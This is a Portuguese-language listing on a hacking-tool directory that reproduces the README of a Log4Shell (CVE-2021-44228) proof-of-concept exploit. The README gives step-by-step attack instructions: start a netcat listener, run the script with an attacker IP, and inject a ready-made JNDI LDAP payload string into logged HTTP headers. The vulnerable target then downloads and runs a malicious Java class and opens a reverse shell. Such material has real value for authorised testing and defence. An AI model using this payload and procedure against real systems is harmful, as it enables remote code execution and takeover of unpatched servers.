Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
log4j-shell-poc — Um Proof-of-Concept para a vulnerabilidade CVE-2021-44228. | Kitploit
Ferramentas/GitHubGitHub/jiahong-guan/log4j-shell-poc
Geração de PayloadsExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubjiahong-guan/log4j-shell-poc

log4j-shell-poc

Um Proof-of-Concept para a vulnerabilidade CVE-2021-44228.

Ver Repositório
16há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

log4shell-poc (CVE-2021-44228)

Exploit de prova de conceito para a vulnerabilidade Log4j (CVE-2021-44228), também conhecida como Log4Shell. Esta ferramenta gera uma classe Java maliciosa, inicia um servidor de referência LDAP e serve o payload via HTTP, permitindo que um atacante remoto execute comandos arbitrários em um alvo vulnerável.

Funcionalidades

  • Detecção automática do endereço IPv4 local como IP de bind padrão.
  • Suporte ao JDK 1.8.0_20 incluído (recomendado) com fallback para o Java do sistema.
  • Payload de reverse shell inline (conecta de volta a um listener netcat).
  • Compilação limpa e remoção automática dos arquivos gerados.

Requisitos

  • Python 3.6 ou superior
  • Os seguintes arquivos/diretórios devem estar presentes na mesma pasta que poc.py:
    • jdk1.8.0_20/ – uma cópia do Oracle JDK 1.8.0_20 (contém bin/javac e bin/java). Se estiver ausente, o script tentará usar os comandos javac e do sistema.
java
  • target/marshalsec-0.0.3-SNAPSHOT-all.jar – o arquivo JAR do marshalsec usado para iniciar o servidor LDAP.
  • Instalação

    1. Clone ou baixe este repositório.
    2. Coloque a pasta jdk1.8.0_20 e o JAR do marshalsec conforme descrito acima.
    3. Instale as dependências Python:
      root@kitploit:~
      pip install -r requirements.txt
      

    Uso

    Execute o script com Python:

    root@kitploit:~
    python3 poc.py [OPTIONS]
    

    Argumentos de linha de comando

    ArgumentoTypePadrãoDescrição
    --useripstringIPv4 auto-detectadoEndereço IP ao qual os servidores LDAP e HTTP farão bind e que será anunciado. Este endereço deve ser alcançável a partir da máquina alvo.
    --webportinteger8000Porta do servidor HTTP que serve o Exploit.class compilado.
    --lportinteger9001Porta onde seu listener netcat aguarda o reverse shell. O payload se conectará de volta a userip:lport.

    Exemplo

    1. Inicie um listener netcat na sua máquina atacante (substitua 9001 pela porta escolhida):

      root@kitploit:~
      nc -lvnp 9001
      
    2. Execute o exploit:

      root@kitploit:~
      python3 poc.py --userip 192.168.1.10 --webport 8080 --lport 9001
      

      Se você omitir --userip, o script usará automaticamente o endereço IPv4 principal da sua máquina.

    3. O script exibirá uma string de payload para injetar no alvo vulnerável, por exemplo:

      root@kitploit:~
      ${jndi:ldap://192.168.1.10:1389/a}
      
    4. Injete esta string em qualquer campo de entrada ou cabeçalho HTTP que seja registrado por uma instância vulnerável do Log4j (ex.: User-Agent, X-Forwarded-For, etc.). O alvo se conectará ao servidor LDAP, buscará a classe maliciosa no servidor HTTP e executará o reverse shell.

    5. Você deve ver uma conexão shell aparecer no seu listener netcat.

    Como funciona

    1. O script gera Exploit.java contendo código que abre um reverse shell para userip:lport.
    2. Ele compila o arquivo usando o JDK fornecido (ou o javac do sistema).
    3. Ele inicia um servidor LDAP (via marshalsec) que responde a consultas JNDI com uma referência ao servidor HTTP.
    4. Ele inicia um servidor HTTP simples na porta webport para hospedar o Exploit.class compilado.
    5. Quando um alvo vulnerável realiza uma consulta JNDI com o payload injetado, ele baixa e executa a classe, dando ao atacante um reverse shell.

    Notas importantes

    • O payload do reverse shell usa /bin/sh e é destinado a sistemas alvo do tipo Unix. Para alvos Windows, você precisaria modificar o comando dentro de Exploit.java.
    • O JDK 1.8.0_20 incluído é recomendado porque versões posteriores podem bloquear o recurso de carregamento remoto de classes JNDI usado por este exploit.
    • Certifique-se de que os firewalls permitam conexões de entrada nas portas especificadas (webport e lport) e que o alvo consiga alcançar sua máquina.

    Limpeza

    O script remove automaticamente Exploit.java e Exploit.class ao sair (normalmente ou após um KeyboardInterrupt). Se você precisar manter os arquivos para depuração, comente o bloco finally em poc.py.

    Aviso legal

    Esta ferramenta destina-se apenas a fins educacionais e de testes de segurança autorizados. O uso não autorizado deste exploit contra sistemas que você não possui ou para os quais não tem permissão explícita para testar é ilegal. Os autores não são responsáveis por qualquer uso indevido ou dano causado por este software.

    Créditos

    • PoC original por kozmer
    • Marshalsec por mbechler
    • Vulnerabilidade do Log4j descoberta pelo Alibaba Cloud Security Team
    Baixar ferramenta